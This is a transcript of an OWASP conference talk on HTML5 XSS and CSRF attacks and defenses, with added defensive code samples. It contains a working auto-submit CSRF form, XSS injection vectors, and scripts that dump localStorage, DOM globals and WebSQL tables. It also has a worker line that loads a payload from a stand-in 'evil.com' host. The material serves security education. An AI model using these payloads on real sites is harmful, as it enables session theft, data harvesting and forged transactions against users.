XSS and CSRF with HTML5
Transcript

  • 1. XSS & CSRF with HTML5 – Attack, Exploit and Defense
    Shreeraj Shah, Blueinfy Solutions Pvt. Ltd., shreeraj.shah@blueinfy.net
    OWASP AppSecUSA 2012
    Copyright © The OWASP Foundation. Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation, http://www.owasp.org
  • 2. Who Am I?
    http://shreeraj.blogspot.com, shreeraj@blueinfy.com, http://www.blueinfy.com, Twitter @shreeraj
    Founder & Director – Blueinfy & iAppSecure Solutions Pvt. Ltd.
    Past experience – Net Square (Founder), Foundstone (R&D/Consulting), Chase (Middleware), IBM (Domino Dev)
    Interest – Web security research
    Published research
      Articles / Papers – SecurityFocus, O'Reilly, DevX, InformIT etc.
      Tools – DOMScan, DOMTracer, wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.
      Advisories – .Net, Java servers etc.
      Presented at Blackhat, RSA, InfoSecWorld, OSCON, OWASP, HITB, Syscan, DeepSec etc.
    Books (Author)
      Web 2.0 Security – Defending Ajax, RIA and SOA
      Hacking Web Services
      Web Hacking
  • 3. HTML5 VECTORS – ATTACK SURFACE
  • 4. HTML5 – Attacks on the rise … Evolution of HTML5
    1991 – HTML started (plain and simple)
    1996 – CSS & JavaScript (welcome to the world of XSS and browser security)
    2000 – XHTML1 (growing concerns and attacks on browsers)
    2005 – AJAX, XHR, DOM (attack cocktail and surface expansion)
    2009 – HTML5 (here we go… new surface, architecture and defense) – HTML + CSS + JS
  • 5. Modern Browser Model (diagram; recovered labels only)
    Presentation: Mobile, HTML5 + CSS, Silverlight, Flash, API (Media, Geo etc.) & Messaging, Plug-In
    Process & Logic: JavaScript, DOM/Events, Parser/Threads
    Network & Access: WebSQL, Cache, Storage, FileSystem, XHR 1 & 2, WebSocket, Plug-in Sockets, Browser Native Network Services
    Core Policies: SOP/CORS/Content-Sec, Sandbox
  • 6. HTML5 Architecture & Threat Model (diagram; recovered labels only)
    User Interface → Application Sandbox (Origin Policy) → Single DOM/Page Application (HTML/CSS, JavaScript) → XHR / WebSockets → Internet / Cross Domain Target Application
    Native APIs: Storage, WebSQL, IndexedDB, Messaging, Geolocation and other APIs, FileSystem, Cache
  • 7. CSRF WITH HTML5
  • 8. CSRF Attack Vector (diagram; recovered labels only)
    Actors: Client/Victim Browser, Web Application Server, Store Database Server, Authentication Server, Attacker's CSRF page
    Flow: Login → Success, cookie set; attacker sends payload, victim visits attacker's page; CSRF attack – with session → Success
    Successful exploitation: SOP bypass, Cookie Replay
  • 9. SOP bypass and Cookie Replay – Basic Type
    GET Request
      IMG SRC    <img src="http://host/?command">
      SCRIPT SRC <script src="http://host/?command">
      IFRAME SRC <iframe src="http://host/?command">
    POST Request
      <script type="text/javascript" language="JavaScript">
        document.foo.submit();
      </script>
  • 10. Streams – name/value pairs are gone … JSON, XML, JS-Script, JS-Object, JS-Array
  • 11. CSRF injection – splitting and forcing …
    The XML body is split across the input's name and value; with ENCTYPE text/plain the browser sends name=value, which reassembles it.
      <html><body>
      <FORM NAME="buy" ENCTYPE="text/plain" action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST">
        <input type="hidden" name='<?xml version' value='"1.0"?><methodCall><methodName>stocks.buy</methodName><params><param><value><string>MSFT</string></value></param><param><value><double>26</double></value></param></params></methodCall>'>
      </FORM>
      <script>document.buy.submit();</script>
      </body></html>
  • 12. CSRF with XHR and CORS bypass (browser model diagram as on slide 5; the XHR 1 & 2 and SOP/CORS layers are the ones in play)
  • 13. XHR – Level 2 powering CSRF
    The XHR object of HTML5 is very powerful: it allows interesting features like cross-origin requests and binary upload/download.
    xhr.responseType can be set to "text", "arraybuffer", "document" and "blob".
    Also, for posting a data stream: DOMString, Document, FormData, Blob, File, ArrayBuffer etc.
  • 14. CORS & XHR – ingredients for CSRF
    Before HTML5 – cross domain was not possible through XHR (SOP applicable)
    HTML5 – allows cross-origin calls with XHR Level 2 calls
    CORS – Cross Origin Resource Sharing needs to be followed (OPTIONS/preflight calls)
    Adding extra HTTP headers (Access-Control-Allow-Origin and a few others)
  • 15. CORS based HTTP Headers
    Request: Origin, Access-Control-Request-Method (preflight), Access-Control-Request-Headers (preflight)
    Response: Access-Control-Allow-Origin, Access-Control-Allow-Credentials, Access-Control-Expose-Headers, Access-Control-Max-Age (preflight), Access-Control-Allow-Methods (preflight), Access-Control-Allow-Headers (preflight)
  • 16. XHR – Stealth POST/GET
    CSRF – powered by CORS and XHR. Hence, a stealth channel and possible silent exploitation.
    One-way CSRF with any stream, since XHR allows a raw stream from the browser (XML, JSON, Binary as well)
    Two-way CSRF (POST and read both – in case Allow-Origin is set to *)
  • 17. Exploiting the use case
    CORS preflight bypass – certain Content-Types bypass the HTTP preflight
    Forcing cookie replay by "withCredentials"
    Internal network scanning and tunneling
    Information harvesting (internal crawling)
    Stealth browser shell – post XSS (Allow-Origin: *)
    Business functionality abuse (upload and binary streams)
  • 18. CSRF with XHR/HTML5 (diagram; recovered labels only): user establishing a session – login request (HTTPS) to the Authentication Server, session cookie set; actors as on slide 8
  • 19. CSRF with XHR/HTML5 (diagram; recovered labels only): browser using an XHR call – JavaScript, user making a buy over HTTP, placing an order (JSON services) → Success
  • 20. CSRF with XHR/HTML5 (diagram; recovered labels only): attacker's CSRF page, attacker sends payload, victim visits; session is still live – not yet logged out
    Leveraging the XHR call: Content-type chosen to avoid preflight; "withCredentials" set to true
  • 21. CSRF & HTML5
  • 22. CSRF with XHR/HTML5 (diagram; recovered labels only): XHR initiates the HTTP buy request; Success – cookie replayed
    Hence: without the victim's consent or notice, a stealth HTTP request is generated and silent exploitation takes place ("Got it")
  • 23. CSRF & HTML5
  • 24. CSRF with XHR/HTML5 (diagram; recovered labels only): browser has a form (multi-part) business-layer function for uploading; uploading bulk orders → Success
  • 25. CSRF/Upload - POC
  • 26. CSRF with XHR/HTML5 (diagram; recovered labels only): XHR initiates an HTTP multi-part upload; Success – cookie replayed
    Hence: without the victim's consent or notice, a stealth HTTP upload takes place and silent exploitation… ("Got it")
  • 27. CSRF/Upload
  • 28. Internal Scan – not scan but crawl as well … (diagram; recovered labels only): the Attacker's Site on the Internet delivers the CSRF payload and a stealth channel to the Client/Victim Browser; from the Intranet the browser reaches the Internal Web Application, Internal HR, Internal Mail and Internal Web/App Server
  • 29. Internal Scan for CORS
  • 30. Scan and Defend
    Scan and look for: Content-Type checking on the server side; CORS policy scan; Form and Upload with tokens or not
    Defense and Countermeasures: Secure libraries for streaming HTML5/Web 2.0 content; CSRF protections; Stronger CORS implementation
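The server-side checks slides 11–30 call for, written out as an added example (not code from the talk): a gate for a cookie-authenticated, state-changing endpoint such as the trade.example.com order call. Function names, the request object shape and the attacker.example origin are constructed for this example.

```javascript
// Media types a browser may POST cross-origin without a CORS preflight. The
// text/plain <form> of slide 11 and a "simple" XHR POST both fall in this set,
// so the server cannot assume a preflight happened for them.
const PREFLIGHT_FREE_TYPES = [
  "application/x-www-form-urlencoded",
  "multipart/form-data",
  "text/plain",
];

function mediaType(contentType) {
  return (contentType || "").split(";")[0].trim().toLowerCase();
}

function skipsPreflight(contentType) {
  return PREFLIGHT_FREE_TYPES.includes(mediaType(contentType));
}

// Decide whether a state-changing request is acceptable and which CORS headers
// to emit. allowedOrigins is a fixed allowlist; it is never widened to "*"
// because the endpoint is used with cookies (withCredentials).
function gateStateChangingRequest(req, allowedOrigins) {
  const origin = req.headers["origin"];
  const type = mediaType(req.headers["content-type"]);
  const headers = {};

  // 1. Require the JSON type the API actually uses: a text/plain form or a
  //    preflight-free XHR stream (slides 11, 17, 20) is refused before any
  //    business logic runs.
  if (type !== "application/json") {
    return { ok: false, status: 415, reason: "unexpected Content-Type: " + (type || "(none)"), headers };
  }
  // 2. Browser-issued cross-origin POSTs carry an Origin header; only listed
  //    origins may call with credentials, and the matched origin is echoed back.
  if (origin !== undefined && !allowedOrigins.includes(origin)) {
    return { ok: false, status: 403, reason: "origin not allowed: " + origin, headers };
  }
  if (origin !== undefined) {
    headers["Access-Control-Allow-Origin"] = origin;
    headers["Access-Control-Allow-Credentials"] = "true";
    headers["Vary"] = "Origin";
  }
  // 3. A per-session anti-CSRF token is still required: the cookie alone is
  //    replayed by the browser on the attacker's behalf.
  const token = req.headers["x-csrf-token"];
  if (!token || token !== req.sessionToken) {
    return { ok: false, status: 403, reason: "missing or mismatched CSRF token", headers };
  }
  return { ok: true, status: 200, reason: "accepted", headers };
}

// Constructed sample requests as the server would see them (sessionToken is the
// value the server stored in the victim's session).
const SAMPLE_REQUESTS = {
  textPlainForm: { headers: { origin: "http://attacker.example", "content-type": "text/plain" }, sessionToken: "tok-123" },
  jsonOrder: { headers: { origin: "https://trade.example.com", "content-type": "application/json", "x-csrf-token": "tok-123" }, sessionToken: "tok-123" },
  crossOriginXhr: { headers: { origin: "http://attacker.example", "content-type": "application/json", "x-csrf-token": "guess" }, sessionToken: "tok-123" },
};
```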
  • 31. XSS WITH HTML5
  • 32. XSS with HTML5 (tags, attributes and events) (browser model diagram as on slide 5; the Presentation and DOM/Events layers are the ones in play)
  • 33. HTML5 – Tags/Attributes/Events
    Tags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, form control (keys)
    Attributes – form, submit, autofocus, sandbox, manifest, rel etc.
    Events/Objects – Navigation (_self), editable content, Drag-Drop APIs, pushState (History) etc.
  • 34. XSS variants – Media tags
    Examples
      <video><source onerror="javascript:alert(1)">
      <video onerror="javascript:alert(1)"><source>
  • 35. XSS variants – Exploiting autofocus
      <input autofocus onfocus=alert(1)>
      <select autofocus onfocus=alert(1)>
      <textarea autofocus onfocus=alert(1)>
      <keygen autofocus onfocus=alert(1)>
  • 36. XSS variants – Form & Button etc.
      <form id="test" /><button form="test" formaction="javascript:alert(1)">test
      <form><button formaction="javascript:alert(1)">test
    Etc … and more … Nice HTML5 XSS cheat sheet (http://html5sec.org/)
  • 37. Scan and Defend
    Scan and look for: Reflected or Persistent XSS spots with HTML5 tags
    Defense and Countermeasures: Have them added to your blacklist; Standard XSS protections by encoding
  • 38. CSP in Action – HTML5 defense …
    Content Security Policy – defending the browser against possible post-attack scenarios
    Based on Origin (SOP is the key)
    Allows a whitelisting mechanism for what "to do" and "not to do"
    It is possible to send a notification back to the application when a violation takes place
    Implementation by extra HTTP headers [browser-specific: X-WebKit-CSP (S/C), X-Content-Security-Policy (F)]
  • 39. Blocking Scripts
    Content-Security-Policy: script-src 'self'
    Only allows script from self (the page's own origin)
    Other mechanisms: 'unsafe-inline' – inline script is blocked unless this keyword is present; 'unsafe-eval' – eval-type calls are blocked unless this keyword is present
    Post-XSS defense can be crafted
  • 40. Controlling Browser
    connect-src – controlling WebSocket, XHR etc.
    frame-src – source of the frame (ClickJacking)
    object-src – Flash, Silverlight etc.
    media-src – controlling audio and video
    img-src / style-src – image and style sources
    default-src https:; – locking over SSL only
  • 41. Example: Persistent XSS injected
    HTTP/1.1 200 OK
    Date: Wed, 12 Sep 2012 14:40:31 GMT
    Server: Microsoft-IIS/6.0
    X-Powered-By: ASP.NET
    X-WebKit-CSP: script-src 'self'
    X-AspNet-Version: 2.0.50727
    Cache-Control: private
    Content-Type: text/html; charset=utf-8
    Content-Length: 6146
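A small CSP policy parser and lint for the settings slides 38–41 discuss, added here as an example (not code from the talk). It flags the one mistake that makes a post-XSS policy moot: `self` written without quotes is a host-source, not the `'self'` keyword. Function names are hypothetical; the sample header values are constructed.

```javascript
// CSP keywords that only count when written in single quotes.
const KEYWORDS = new Set(["self", "none", "unsafe-inline", "unsafe-eval"]);

// "script-src 'self'; object-src 'none'" -> { "script-src": ["'self'"], "object-src": ["'none'"] }
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    policy[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return policy;
}

// Returns a list of findings; an empty list means the policy does what the
// author of slide 39 intends (scripts only from the page's own origin).
function lintCsp(header) {
  const policy = parseCsp(header);
  const findings = [];
  for (const [directive, sources] of Object.entries(policy)) {
    for (const src of sources) {
      // A bare keyword name is parsed as a host called e.g. "self": the page's
      // own scripts are not matched and the policy does not say what it looks like.
      const bare = src.toLowerCase();
      if (KEYWORDS.has(bare)) {
        findings.push(directive + ': "' + src + "\" is a host-source here; write '" + bare + "' to use the keyword");
      }
      if (src === "*") findings.push(directive + ": wildcard source allows any origin");
    }
    if (directive === "script-src" || directive === "default-src") {
      if (sources.includes("'unsafe-inline'")) findings.push(directive + ": 'unsafe-inline' re-enables the injected inline script CSP is meant to block");
      if (sources.includes("'unsafe-eval'")) findings.push(directive + ": 'unsafe-eval' permits eval-type calls");
    }
  }
  if (!("default-src" in policy)) {
    findings.push("default-src missing: resource types not listed fall back to allowing everything");
  }
  return findings;
}

// Constructed sample policies: the header value as it appears on slide 41, and a
// corrected one that also locks the remaining resource types to HTTPS.
const SLIDE_41_CSP = "script-src self";
const CORRECTED_CSP = "default-src https:; script-src 'self'; object-src 'none'";
```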
  • 42. Storage extraction with XSS (browser model diagram as on slide 5; the Storage and FileSystem layers are the ones in play)
  • 43. Web Storage Extraction
    The browser used to have one place to store data – the cookie (limited and replayed)
    HTML5 – Storage API provided (Local and Session)
    Can hold global scoped variables
    http://www.w3.org/TR/webstorage/
  • 44. Web Storage Extraction
    It is possible to steal them through XSS or via JavaScript
    Session hijacking – HttpOnly is of no use here
    getItem and setItem calls
    XSS the box and scan through storage
  • 45. Blind storage enumeration
      if (localStorage.length) {
        console.log(localStorage.length);
        // key(n) walks only the stored entries, not the Storage prototype's methods
        for (var n = 0; n < localStorage.length; n++) {
          var key = localStorage.key(n);
          console.log(key);
          console.log(localStorage.getItem(key));
        }
      }
    The above code allows extraction of all storage variables
  • 46. File System Storage
    HTML5 provides a virtual file system with filesystem APIs
      window.requestFileSystem = window.requestFileSystem || window.webkitRequestFileSystem;
    It becomes a full-blown local file system for the application, inside the sandbox
    It empowers the application
  • 47. File System Storage
    It provides a temporary or permanent file system
      var filesys;                       // handle kept for later file operations
      function catcherror(e) { console.log("FileSystem error: " + e.name); }
      function init() {
        // request 1 MB of temporary sandboxed storage
        window.requestFileSystem(window.TEMPORARY, 1024 * 1024, function (filesystem) {
          filesys = filesystem;
        }, catcherror);
      }
    The app can have a full filesystem in place now.
  • 48. Sensitive information in the filesystem – assuming the app is creating a profile on the local system
  • 49. Extraction through XSS – once there is an entry point, game over!
  • 50. Single DOM / One Page App – XSS
    Applications run with a "rich" DOM
    JavaScript sets several variables and parameters while loading – GLOBALS
    These hold sensitive information; what if they are GLOBAL and remain during the life of the application?
    They can be retrieved with XSS
    HTTP requests and responses go through JavaScript (XHR) – what about those vars?
  • 51. Blind Enumeration
      for (var i in window) {
        var obj = window[i];
        try {
          if (typeof obj == "string") {
            console.log(i);
            console.log(obj.toString());
          }
        } catch (ex) {}
      }
  • 52. Global Sensitive Information Extraction from DOM
    HTML5 apps running on a single DOM have several key global variables, objects and arrays
      var arrayGlobals = ["my@email.com", "12141hewvsdr9321343423mjfdvint", "test.com"];
    Post-DOM-based exploitation is possible, harvesting all these values.
  • 53. Global Sensitive Information Extraction from DOM
      for (var i in window) {
        var obj = window[i];
        if (obj != null) {               // skips both null and undefined
          var type = typeof obj;
          if (type == "object" || type == "string") {
            console.log("Name:" + i);
            try {
              var my = JSON.stringify(obj);
              console.log(my);
            } catch (ex) {}
          }
        }
      }
  • 54. Scan and Defend
    Scan and look for: scanning storage
    Defense and Countermeasures: Do not store sensitive information in localStorage and globals; XSS protection
  • 55. SQLi & Blind Enumeration through XSS (browser model diagram as on slide 5; the WebSQL layer is the one in play)
  • 56. SQL Injection
    WebSQL is part of the HTML5 specification; it provides a SQL database to the browser itself.
    Allows one-time data loading and offline browsing capabilities.
    Causes security concerns and potential injection points.
    Methods and calls are possible
  • 57. SQL Injection – Through JavaScript one can harvest the entire local database. Example:
  • 58. Blind WebSQL Enumeration
      var dbo;
      var table;
      var usertable;
      for (var i in window) {
        var obj = window[i];
        try {
          if (obj.constructor.name == "Database") {
            dbo = obj;
            obj.transaction(function (tx) {
              tx.executeSql("SELECT name FROM sqlite_master WHERE type='table'", [], function (tx, results) {
                table = results;
                // the result set only exists once this callback runs, so pick the table here
                if (table.rows.length > 1) usertable = table.rows.item(1).name;
              }, null);
            });
          }
        } catch (ex) {}
      }
  • 59. Blind WebSQL Enumeration
    We run through all objects and get the object whose constructor is "Database"
    We make a SELECT query directly against the sqlite_master table
    We grab the 1st table, leaving the webkit table in the 0th entry
  • 60. Blind WebSQL Enumeration
  • 61. Web Messaging and Worker Injection (browser model diagram as on slide 5; the Messaging and Parser/Threads layers are the ones in play)
  • 62. Web Messaging
    HTML5 has a new inter-frame communication system called Web Messaging.
    With the postMessage() call the parent frame/domain can talk to the iframe; the iframe can be loaded cross-domain.
    Hence it creates issues – data/information validation and data leakage by cross posting are possible
    worker.webkitPostMessage – faster transferable objects
  • 63. Web Messaging - Scenario
    If the postMessage() target origin is set to *, the page can be loaded in an iframe and the messaging hijacked
    Also, if the origin is not set to a fixed value, the frame listens to any domain – again an issue
    The incoming stream needs to be checked before innerHTML or eval()
    An iframe or Web Worker can glue two streams – same domain or cross domain
  • 64. Origin check
  • 65. Web Worker – Hacks!
    Web Workers allow threading in HTML pages using JavaScript
    No need to use JavaScript calls like setTimeout(), setInterval(), XMLHttpRequest, and event handlers
    Totally async and well supported
      [initialize] var worker = new Worker('task.js');
      [Messaging]  worker.postMessage();
  • 66. Web Worker – Hacks! (diagram; recovered labels only)
    Web Page: current DOM, JavaScript runtime; Web Worker: background thread on the same page, scope and objects exchanged via messaging – no DOM access; has XHR, Location, Navigator, Regex, Array, JSON etc.; both on the Browser Platform
  • 67. Web Worker – Hacks! Security issues
    It does not allow loading cross-domain worker scripts (http:, https:, javascript:, data: – no)
    It has some typical issues:
      It allows the use of XHR. Hence, in-domain and CORS requests are possible
      It can cause DoS – if the user gets a stream to run JavaScript in the worker thread. It doesn't have access to the parent DOM though
      Message validation needed – else DOM based XSS
  • 68. Web Worker – Hacks! Example
      <html>
      <button onclick="Read()">Read Last Message</button>
      <button onclick="stop()">Stop</button>
      <output id="result"></output>
      <script>
        function Read() {
          worker.postMessage({cmd: 'read', msg: 'last'});
        }
        function stop() {
          worker.postMessage({cmd: 'stop', msg: 'stop it'});
          alert("Worker stopped");
        }
        var worker = new Worker('message.js');
        worker.addEventListener('message', function (e) {
          // worker output is written with innerHTML: unvalidated message data becomes DOM based XSS (slide 67)
          document.getElementById('result').innerHTML = e.data;
        }, false);
      </script>
      </html>
  • 69. Web Workers – Hacks!
    Possible to cause XSS: running script, passing a hidden payload
    Also, web workers can help in embedding a silently running js file that can be controlled.
    Can be a tool for payload delivery and control within the browser framework
    importScripts("http://evil.com/payload.js") – a worker can run a cross-domain script
  • 70. Scan and Defend
    Scan and look for: JavaScript scanning; Messaging and Worker implementation; DOM calls; use of eval(), document.* calls etc.
    Defense and Countermeasures: Same-origin listening is a must for the messaging event; Secure JavaScript coding
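The origin check of slides 63–64 and the "message validation" of slides 67–68, written out as an added example (not code from the talk): a receiver that accepts messages only from a fixed origin allowlist, insists on a typed {cmd, msg} payload, and renders with textContent instead of the innerHTML sink of slide 68. The origins, command names and the stub output element are constructed so it runs without a browser; `event` is a plain object shaped like a MessageEvent.

```javascript
// Fixed allowlist: the only origins whose messages this page acts on.
const TRUSTED_ORIGINS = new Set(["https://app.example", "https://widget.example"]);
// Commands the worker/frame protocol of slide 68 actually defines.
const COMMANDS = new Set(["read", "stop"]);

// Validate one incoming message and return the decision so it can be tested.
// `output` stands in for the <output id="result"> element of slide 68.
function handleMessage(event, output, trustedOrigins = TRUSTED_ORIGINS) {
  // 1. Origin allowlist: a message from a page that merely embedded this frame
  //    on some other domain is dropped before its data is touched.
  if (!trustedOrigins.has(event.origin)) {
    return { accepted: false, reason: "untrusted origin " + event.origin };
  }
  // 2. Structured, typed payload instead of a free-form string fed to a sink.
  const data = event.data;
  if (typeof data !== "object" || data === null ||
      typeof data.cmd !== "string" || typeof data.msg !== "string") {
    return { accepted: false, reason: "malformed message" };
  }
  if (!COMMANDS.has(data.cmd)) {
    return { accepted: false, reason: "unknown command " + data.cmd };
  }
  // 3. Render as text: any markup in msg is displayed literally, never parsed.
  output.textContent = data.msg;
  return { accepted: true, cmd: data.cmd };
}

// Sending side: name the target origin explicitly; "*" would let any page that
// framed the target read the message.
function sendToFrame(targetWindow, cmd, msg, targetOrigin) {
  if (targetOrigin === "*") {
    throw new Error("refusing to post to a wildcard origin");
  }
  targetWindow.postMessage({ cmd: cmd, msg: msg }, targetOrigin);
}

// In a browser this is how the receiver would be wired up (not executed here):
// window.addEventListener("message", function (e) {
//   handleMessage(e, document.getElementById("result"));
// }, false);
```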
  • 71. APIs …
    A few other HTML5 APIs are interesting from a security standpoint
    File APIs – allow local file access and can be mixed with ClickJacking and other attacks to gain client files
    Drag-Drop APIs – exploiting self XSS and a few other tricks, hijacking cookies …
    Lots more to explore and defend…
  • 72. Resources/References
    http://www.html5rocks.com/en/ (Solid stuff)
    https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet (OWASP stuff)
    http://html5sec.org/ (Quick cheat sheet)
    http://html5security.org/ (Good resources)
    http://blog.kotowicz.net/ (Interesting work)
  • 73. CONCLUSION AND QUESTIONS
    http://shreeraj.blogspot.com, shreeraj@blueinfy.com, http://www.blueinfy.com
